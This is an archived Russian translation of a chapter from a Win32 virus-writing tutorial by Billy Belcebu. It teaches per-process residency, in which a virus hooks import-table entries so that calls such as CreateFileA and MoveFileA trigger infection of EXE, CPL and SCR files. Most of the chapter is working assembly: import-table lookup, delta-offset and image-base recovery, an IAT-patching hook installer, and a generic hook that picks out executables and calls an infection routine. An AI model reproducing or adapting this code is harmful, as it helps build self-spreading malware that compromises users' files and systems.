Путеводитель по написанию вирусов под Win32: 6. Перпроцессная резидентность

Дата публикации 28 окт 2002

Путеводитель по написанию вирусов под Win32: 6. Перпроцессная резидентность — Архив WASM.RU

Теперь мы обсудим интересную тему для дискуссии: перпроцессная резидентность, единственный вид резидентности, доступный под всеми Win32 платформами. Я поместил эту главу отдельно от главы Ring-3, потому что эта тема слишком сложна для такой вводной главы, такой как Ring-3.

Введение

Перпроцессная резидентность впервые была реализованна Jacky Qwerty из вирусной группы 29A в 1997 году. Кроме того, что это был первый (по мнению средств массовой информации, а не в реальности - Win32.Jacky) Win32-вирус, он также был первым резидентным Win32-вирусом, использующим никогда ранее не виданную технику: перпроцессную резидентность. Теперь вы, по-видимому, удивляетесь: 'Что же такое, ядрена матрена, эта перпроцессная резидентность?'. Я уже объяснил это в одной из статей журнала DDT#1, но здесь я проведу более глубокий анализ этого метода. Когда вы вызываете функцию API, вы используете адрес, сохраненный системой во время выполнения в таблице импортов, и меняете адрес функции API на адрес своего собственного кода, заражаещего файлы при вызове перехваченной функции. Я знаю, что это немного путанно и тяжело понять, но в вирмейкерстве все вначале выглядет сложным, хотя потом становится очень простым :smile3:.

--[DDT#1.2_4]---------------------------------------------------------------

Это единственный известный мне способ сделать Win32 вирусы резидентными. Да, вы правильно прочитали: Win32, а не Win9X. Этот способ будет также работать и под WinNT. Во-первых, вы должны знать, что такое процесс. Вещь, которая меня озадачила больше всего, что люди, начавшие программировать под Win32, знают, что это такое и часто это используют, но не знают его название. В общем, когда мы запускаем Windows-приложение, мы создаем процесс :smile3:. Очень легко поянть. И в чем состоит данная резидентность? Сначала мы должны зарезервировать память, куда поместить тело вируса. Это можно сделать с помощью функции "VirtualAlloc". Но... как перехватить функции API? Наиболее полезное решение, приходящее мне в голову состоит в том, чтобы изменять адреса в таблице импортов. С моей точки зрения, это единственный возможный путь. Поскольку в импорты можно писать, наша задача во многом облегчается, так как нам не нужна помощь никаких функций VxDCall0...

У этого вида резидентности есть и слабая сторона... так как мы опираемся на таблицу импортов, мы можем работать только с импортированными функциям, и скорость заражения очень сильно зависит от файла, который мы заразили. Например, если мы заразим CMD.EXE в WinNT и у нас будут обработчики FindFirstFile(A/W) и FindNextFile(A/W), то это позволит заразить все файлы, найденные с помощью этих функций. Это сделает наш вирус очень заразным, так как эти функции будут использоваться, когда мы выполним команду DIR под WinNT. Как бы то ни было, использовать одну перпроцессную резидентность не стоит, чтобы наш вирус был более заразным, небходимо использовать другие методы, например как в Win32.Cabanas, где заражались файлы в \WINDOWS и \WINDOWS\SYSTEM. Другим хорошим способом может быть заражение определенных файлов при первом запуске в системе...

--[DDT#1.2_4]---------------------------------------------------------------

Я написал это в декабре 1998. С тех пор я понял, как это можно сделать без резервирования памяти, но тем не менее я помещу код так, как есть, чтобы вы поняли лучше.

Обработка таблицы импортов

Далее следует структура таблицы импортов.

IMAGE_IMPORT_DESCRIPTOR

А теперь посмотрим, что об этом говорит Мэтт Питрек.

DWORD Characteristics

Когда-то это могло быть набором флагов. Тем не менее Microsoft изменила ее значение и никогда не заботилась о том, чтобы обновить WINNT.H. На самом деле это поле является смещением (RVA) массива указателей, каждый из которых указывает на структуру IMAGE_IMPORT_BY_NAME.

DWORD TimeDateStamp

Время/дата, указывающая на то, когда был создан файл.

DWORD ForwarderChain

Это поле относится к форвардингу. Форвардинг - это когда одна DLL шлет ссылку на некоторые свои функции другой DLL. Например, в WinNT NTDLL.DLL (похоже) шлет некоторые из своих экспортируемых функций KERNEL32.DLL. Это поле содержит индекс в массиве FirstThunk. Функция, проиндексированная в этом поле, будет отфорваржена другой DLL. К сожалению, формат форвардинга функций недокументирован, а пример форварднутых функций сложно найти.

DWORD Name

Это RVA на строку в формате ASCIIz, содержащую имя импортируемой DLL, например "KERNEL32.DLL" и "USER32.DLL".

PIMAGE_THUNK_DATA FirstThunk

Это поле является смещением (RVA) объединения IMAGE_THUNK_DATA. Почти в каждом случае данное объединение интерпретируется как указатель на структуру IMAGE_IMPORT_BY_NAME. Если поле не является одним из этих указателей, то это вероятно ординал. Из документации не совсем понятно, можно ли импортивать функцию по ординалу, а не по имени. Важными полями являются IMAGE_IMPORT_DESCRIPTOR - это имя импортируемой DLL и два массива указателей IMAGE_IMPORT_BY_NAME. В EXE-файле два массива (на которые указывают поля Characteristics и FirstThunk) идут параллельно друг с другом и каждый завершается NULL-элементом. Указатели в обоих массивах указывают на структуру IMAGE_IMPORT_BY_NAME.

Теперь, когда вы знаете определения Мэтта Питрека, я помещу здесь необходимый код, чтобы получать из таблицы импортов адреса API-функций и адрес, где находится смещение на функцию (которую мы хотим перехватить, но об этом чуть попозже).

Код (Text):
  1.  
  2. ;---[ CUT HERE ]-------------------------------------------------------------
  3. ;
  4. ; процедура GetAPI_IT
  5. ;  --------------------
  6. ;
  7. ; Далее следует код, который получает кое-какую информацию из таблицы импор-
  8. ; тов.
  9.  
  10.  GetAPI_IT      proc
  11.  
  12.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  13.  ; Ок, давайте начнем веселье. Параметры, которые требуются для этой        ;
  14.  ; функции, и возвращаемое значение следующие:                              ;
  15.  ;                                                                          ;
  16.  ; ВВОД  . EDI : Указатель на имя API-функции (чувствительно к регистру)    ;
  17.  ; ВЫВОД . EAX : Адрес API-функции                                          ;
  18.  ;         EBX : Адрес адреса API-функции в таблице импортов                ;
  19.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  20.  
  21.         mov     dword ptr [ebp+TempGA_IT1],edi  ; Сохраняем указатель на имя
  22.         mov     ebx,edi
  23.         xor     al,al                           ; Ищем "\0"
  24.         scasb
  25.         jnz     $-1
  26.         sub     edi,ebx                         ; Получаем размер имени
  27.         mov     dword ptr [ebp+TempGA_IT2],edi  ; Сохраняем размер имени
  28.  
  29.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  30.  ; Сначала мы сохраняем указатель на имя API-функции во временной           ;
  31.  ; переменной, а затем ищем конец строки, помеченный 0, после чего вычитаем ;
  32.  ; от нового значения EDI (которое указывает на 0) его старое значение,     ;
  33.  ; получая, таким образом, размер имени API-функции. Просто, не правда ли?  ;
  34.  ; Далее мы сохраняем размер API-функции в другой временной переменной.     ;
  35.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  36.  
  37.         xor     eax,eax                         ; Обнуляем EAX
  38.         mov     esi,dword ptr [ebp+imagebase]   ; Загружаем базу образа проц.
  39.         add     esi,3Ch                         ; Указатель на смещение 3Ch
  40.         lodsw                                   ; Получаем заголовок PE проц.
  41.         add     eax,dword ptr [ebp+imagebase]   ; адрес (нормализованный!)
  42.         xchg    esi,eax
  43.         lodsd
  44.  
  45.         cmp     eax,"EP"                        ; Это действительно PE?
  46.         jnz     nopes                           ; Дерьмо!
  47.  
  48.         add     esi,7Ch
  49.         lodsd                                   ; Получаем адрес
  50.         push    eax
  51.         lodsd                                   ; EAX = Размер
  52.         pop     esi
  53.         add     esi,dword ptr [ebp+imagebase]
  54.  
  55.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  56.  ; Первое, что мы делаем - это очищаем EAX, потому что нам не нужен мусор в ;
  57.  ; его верхнем слове. Далее нам мы проверяем PE-сигнатуру заголовка         ;
  58.  ; носителя. Если все в порядке, мы получаем указатель на секцию с таблицей ;
  59.  ; импортов (.idata).                                                       ;
  60.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  61.  
  62.  SearchK32:
  63.         push    esi
  64.         mov     esi,[esi+0Ch]                   ; ESI = Укаазтель на имя
  65.         add     esi,dword ptr [ebp+imagebase]   ; Нормализуем
  66.         lea     edi,[ebp+K32_DLL]               ; У-ль на "KERNEL32.dll",0
  67.         mov     ecx,K32_Size                    ; ECX = Размер этой строки
  68.         cld                                     ; Очищаем флаг направления
  69.         push    ecx                             ; Сохр. размер для дал.исп.
  70.         rep     cmpsb                           ; Сравниваем байты
  71.         pop     ecx                             ; Восст. размер
  72.         pop     esi                             ; Восст. у-ль на импорты
  73.         jz      gotcha                          ; Если совп., делаем переход
  74.         add     esi,14h                         ; Получаем след. поле
  75.         jmp     SearchK32                       ; След. проход цикла
  76.  
  77.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  78.  ; Сначала мы заново push'им ESI. Нам необходимо его сохранить, так как это ;
  79.  ; начало секции .idata. Затем мы получаем в ESI RVA имена (указатели),     ;
  80.  ; после чего нормализуем это значение с базой образа, превращая, таким     ;
  81.  ; образом его в VA. Далее мы помещаем в EDI указатель на строку            ;
  82.  ; "KERNEL32.dll", в ECX загружаем размер строки, сравниваем две строки и   ;
  83.  ; если они совпадают, значит мы получили еще одну подходящую строку.       ;
  84.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  85.  
  86.  gotcha:
  87.         cmp     byte ptr [esi],00h              ; Это OriginalFirstThunk 0?
  88.         jz      nopes                           ; Отваливаем, если так
  89.         mov     edx,[esi+10h]                   ; Получаем FirstThunk <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  90.         add     edx,dword ptr [ebp+imagebase]   ; Нормализуем!
  91.         lodsd
  92.         or      eax,eax                         ; Это 0?
  93.         jz      nopes                           ; Дерьмо...
  94.  
  95.         xchg    edx,eax                         ; Получаем указатель на него!
  96.         add     edx,[ebp+imagebase]
  97.         xor     ebx,ebx
  98.  
  99.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  100.  ; Сначала мы проверяем, равно ли поле OriginalFirstThunk NULL, и если так, ;
  101.  ; выходим из процедуры с ошибкой. Затем мы получаем значение FirstThunk и  ;
  102.  ; нормализуем его, прибавляя imagebase, а затем проверяем, равно ли оно 0  ;
  103.  ; (если так, у нас проблемы, тогда выходим). Помещаем в EDX полученый      ;
  104.  ; адрес (FirstThunk), нормализуем, после чего в EAX мы сохраняем указатель ;
  105.  ; на поле FirstThunk.                                                      ;
  106.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  107.  
  108.  loopy:
  109.         cmp     dword ptr [edx],00h             ; Последний RVA? Хм...
  110.         jz      nopes
  111.         cmp     byte ptr [edx+03h],80h          ; Ординал? Duh...
  112.         jz      reloop
  113.  
  114.         mov     edi,dword ptr [ebp+TempGA_IT1]  ; Получ. указ. на имя API-ф-ции
  115.         mov     ecx,dword ptr [ebp+TempGA_IT2]  ; Получаем размер имени
  116.         mov     esi,[edx]                       ; Получаем текущую строку
  117.         add     esi,dword ptr [ebp+imagebase]  
  118.         inc     esi
  119.         inc     esi
  120.         push    ecx                             ; Сохраняем ее размер
  121.         rep     cmpsb                           ; Сохраняем обе строки
  122.         pop     ecx                             ; Восстанавливаем размер
  123.         jz      wegotit
  124.  reloop:
  125.         inc     ebx                             ; Увеличиваем значение указателя
  126.         add     edx,4                           ; Получаем указатель на другую
  127.         loop    loopy                           ; импортированную API-функцию
  128.  
  129.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  130.  ; Сначала мы проверяем, не находимся ли мы в последнем элементе массива    ;
  131.  ; (который отмечен символом null), и если так, заканчиваем работу. Затем   ;
  132.  ; мы проверяем, является ли элемент ординалом, если так, мы получаем еще   ;
  133.  ; один. Далее идет самое интересное: мы помещаем в EDI сохраненный ранее   ;
  134.  ; указатель на имя API-функции, которую мы искали, в ECX у нас находится   ;
  135.  ; размер строки, и мы помещаем в ESI указатель на текущую API-функцию в    ;
  136.  ; таблице импортов. Мы делаем сравнение между этими двумя строками, и если ;
  137.  ; они не совпадают, мы получаем следующую, пока не найдем ее или не        ;
  138.  ; достигнем последней API-функции в таблице импортов.                      ;
  139.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  140.  
  141.  wegotit:
  142.         shl     ebx,2                        ; Умножаем на 4 (размер dword)
  143.         add     ebx,eax                      ; Добавляем к значению FirstThunk
  144.         mov     eax,[ebx]                    ; EAX = адрес API-функции ;)
  145.         test    al,0                         ; Это чтобы избежать перехода и
  146.         org     $-1                          ; немного соптимизировать <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  147.  nopes:
  148.         stc                                  ; Ошибка!
  149.         ret
  150.  
  151.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  152.  ; Очень просто: поскольку счетчик у нас находится в EBX, а массив был      ;
  153.  ; массивом DWORD'ов, мы умножаем на 4 (чтобы получить относительное        ;
  154.  ; смещение, которое отмечает адрес API), а после этого у нас находится в   ;
  155.  ; EBX указатель на желаемый адрес API в таблице импортов, а в EAX у нас    ;
  156.  ; находится адрес API-функции. Совершенно <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">.                              ;
  157.  ;-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·;
  158.  
  159.  GetAPI_IT      endp
  160.  
  161. ;---[ CUT HERE ]-------------------------------------------------------------

Теперь мы знаем, как играть с таблицей импортов. Но нам нужно еще кое-что.

Получение базы образа во время выполнения

Одна из самых наиболее частых заблуждений - это мнение, что база образа будет всегда одной и той же или всегда будет равна 400000h. Но на самом деле, все далеко не так. Независимо от того, какая база образа будет указана в заголовке вашего файла, система может легко поменять во время запуска, поэтому мы будем пытаться получить доступ к неверному адресу и получить неожиданные результаты. Получить базу образа можно достаточно просто. Просто используйте обычную процедуру получения дельта-смещения.

Код (Text):
  1.  
  2.  virus_start:
  3.         call    tier                            ; Push'им в ESP адрес возврата
  4.  tier:  pop     ebp                             ; Получаем адрес возврата
  5.         sub     ebp,offset realcode             ; И отнимаем начальное смещение

Ок? Давайте представим, что, например, выполнение началось по адресу 401000h (как почти во всех слинкованных TLINK'ом файлах). Поэтому когда мы делаем POP, в EBP у нас будет что-то вроде 00401005h. Тогда что вы получите, если вычтете от него virus_start, а от результата мы снова вычтем текущий EIP (который во всех TLINKованных файлах равен 1000h)? Да, мы получим базу образа! Таким образом, мы будем делать следующее:

Код (Text):
  1.  
  2.  virus_start:
  3.         call    tier                        ; Push'им в ESP адрес возврата
  4.  tier:  pop     ebp                         ; Получаем текущий адрес
  5.         mov     eax,ebp
  6.         sub     ebp,offset realcode         ; И отнимаем начальное смещение
  7.         sub     eax,00001000h               ; Отнимаем текущий EIP (должен
  8.  NewEIP equ     $-4                         ; быть пропатчен во время заражения
  9.         sub     eax,(tier-virus_start)      ; Отнимаем остальное <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">

И не забудьте пропатчить переменную NewEIP во время заражения (если модифицируете EIP), что она всегда была равна переменной по смещению 28h заголовка PE, то есть RVA EIP программы :smile3:.

[ Мой перехватчик API-функций ]

Далее следует мое дополнение к моей процедуре GetAPI_II. Она базируется на примерно следующей структуре:

Код (Text):
  1.  
  2.         db      ASCIIz_API_Name
  3.         dd      offset (API_Handler)

Например:

Код (Text):
  1.  
  2.         db      "CreateFileA",0
  3.         dd      offset HookCreateFileA

HookCreateFileA - это процедура, которая обрабатывает перехваченную функцию. Код, который я использовал с этими структурами, следующий:

Код (Text):
  1.  
  2. ;---[ CUT HERE ]-------------------------------------------------------------
  3.  
  4.  HookAllAPIs:
  5.         lea     edi,[ebp+@@Hookz]            ; Указатель на первую API-функцию
  6.  nxtapi:
  7.         push    edi                          ; Сохраняем указатель
  8.         call    GetAPI_IT                    ; Получаем его из таблицы импортов
  9.         pop     edi                          ; Восстанавливаем указатель
  10.         jc      Next_IT_Struc_               ; Не получилось? Проклятье...
  11.                                              ; EAX = адрес API-функции
  12.                                              ; EBX = указатель API-функции
  13.                                              ; в таблице импортов
  14.  
  15.         xor     al,al                        ; Достигаем конца имени API-функции
  16.         scasb
  17.         jnz     $-1
  18.  
  19.         mov     eax,[edi]                    ; Получаем смещение обработчика
  20.         add     eax,ebp                      ; Приводим в соотве. с дельта-см.
  21.         mov     [ebx],eax                    ; И помещаем в импорты!
  22.  Next_IT_Struc:
  23.         add     edi,4                        ; Получаем следующий элемент ст-ры!
  24.         cmp     byte ptr [edi],"."           ; Достигли пследней API-ф-ции? Гр..
  25.         jz      AllHooked                    ; Мы перехватили все
  26.         jmp     nxtapi                       ; Следующий оборот цикла
  27.  AllHooked:
  28.         ret
  29.  
  30.  Next_IT_Struc_:
  31.         xor     al,al                        ; Получаем конец строки
  32.         scasb
  33.         jnz     $-1
  34.         jmp     Next_IT_Struc                ; И возвращаемся обратно <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  35.  
  36.  @@Hookz label   byte
  37.         db      "MoveFileA",0                ; Несколько примеров
  38.         dd      (offset HookMoveFileA)
  39.  
  40.         db      "CopyFileA",0
  41.         dd      (offset HookCopyFileA)
  42.  
  43.         db      "DeleteFileA",0
  44.         dd      (offset HookDeleteFileA)
  45.  
  46.         db      "CreateFileA",0
  47.         dd      (offset HookCreateFileA)
  48.  
  49.         db      "."                             ; Конец массива <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  50. ;---[ CUT HERE ]-------------------------------------------------------------

Я надеюсь, что здесь все достаточно понятно :smile3:.

Универсальный перехватчик

Возможно вы помните, что есть некоторые API-функции, которые принимают последним заPUSHенным параметром указатель на файл (который может быть исполняемым), поэтому мы можем их перехватить и применить универсальный перехватчик, который сначала проверяет расширение файла, и если он исполняемый, мы можем заразить его без всяких проблем :smile3:.

Код (Text):
  1.  
  2. ;---[ CUT HERE ]-------------------------------------------------------------
  3.  
  4.  ; Несколько различных хуков <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  5.  
  6.  HookMoveFileA:
  7.         call    DoHookStuff                     ; обрабатываем этот вызов
  8.         jmp     [eax+_MoveFileA]                ; передаем контроль
  9.                                                 ; оригинальной API-функции
  10.  
  11.  HookCopyFileA:
  12.         call    DoHookStuff                     ; обрабатываем этот вызов
  13.         jmp     [eax+_CopyFileA]                ; передаем контроль
  14.                                                 ; оригинальной API-функции
  15.  
  16.  HookDeleteFileA:
  17.         call    DoHookStuff                     ; обрабатываем этот вызов
  18.         jmp     [eax+_DeleteFileA]              ; передаем контроль
  19.                                                 ; оригинальной API-функции
  20.  
  21.  HookCreateFileA:
  22.         call    DoHookStuff                     ; обрабатываем этот вызов
  23.         jmp     [eax+_CreateFileA]              ; передаем контроль
  24.                                                 ; оригинальной API-функции
  25.  
  26.  ; The generic hooker!!
  27.  
  28.  ; Универсальный перехватчик!! 
  29.  
  30.  DoHookStuff:
  31.         pushad                      ; Push'им все регистры
  32.         pushfd                      ; Push'им все флаги
  33.         call    GetDeltaOffset      ; Получаем дельта-смещение в EBP
  34.         mov     edx,[esp+2Ch]       ; Получаем имя файла, который нужно заразить
  35.         mov     esi,edx             ; ESI = EDX = file to check
  36.  reach_dot:
  37.         lodsb                       ; Получаем символ
  38.         or      al,al               ; Найден NULL? Дерьмо...
  39.         jz      ErrorDoHookStuff    ; Тогда сваливаем
  40.         cmp     al,"."              ; Найдена точка? Интересно...
  41.         jnz     reach_dot           ; Если нет, следующий оборот цикла
  42.         dec     esi                 ; Фиксим
  43.         lodsd                       ; Помещаем расширение в EAX
  44.         or      eax,20202020h       ; Приводим строку к нижнему регистру
  45.         cmp     eax,"exe."          ; Это EXE? Заражаем!!!
  46.         jz      InfectWithHookStuff
  47.         cmp     eax,"lpc."          ; Это CPL? Заражаем!!!!
  48.         jz      InfectWithHookStuff
  49.         cmp     eax,"rcs."          ; Это SCR? Заражаем!!!!
  50.         jnz     ErrorDoHookStuff
  51.  InfectWithHookStuff:
  52.         xchg    edi,edx             ; EDI = имя файла, который нужно заразить
  53.         call    InfectEDI           ; Заражаем файл!! ;)
  54.  ErrorDoHookStuff:
  55.         popfd                       ; Восстанавливаем все предохраненные
  56.         popad                       ; регистры, чтобы ничего не случилось <img src="styles/smiles_s/smile3.gif" class="mceSmilie" alt=":smile3:" title="Smile3    :smile3:">
  57.         push    ebp
  58.         call    GetDeltaOffset      ; Получаем дельта-смещение
  59.         xchg    eax,ebp             ; Помещаем дельта-смещение в EAX
  60.         pop     ebp
  61.         ret
  62.  
  63. ;---[ CUT HERE ]-------------------------------------------------------------

Вот некоторые API-функции, которые можно перехватить с помощью этой универсальной процедуры: MoveFileA, CopyFileA, GetFullPathNameA, DeleteFileA, WinExec, CreateFileA, CreateProcessA, GetFileAttributesA, SetFileAttributesA, _lopen, MoveFileExA, CopyFileExA, OpenFile.

Заключение

Если что-то непонятно, пишите мне (автору этого текста, а не переводчику! - прим. пер.). Я бы мог привести пример простого пер-процессного резидентного вируса, но единственный подобный вирус, который я написал, слишком сложен и у него слишком много фич, поэтому он будет для вас непонятен :smile3:. © Billy Belcebu, пер. Aquila


0 785
archive

archive
New Member

Регистрация:
27 фев 2017
Публикаций:
532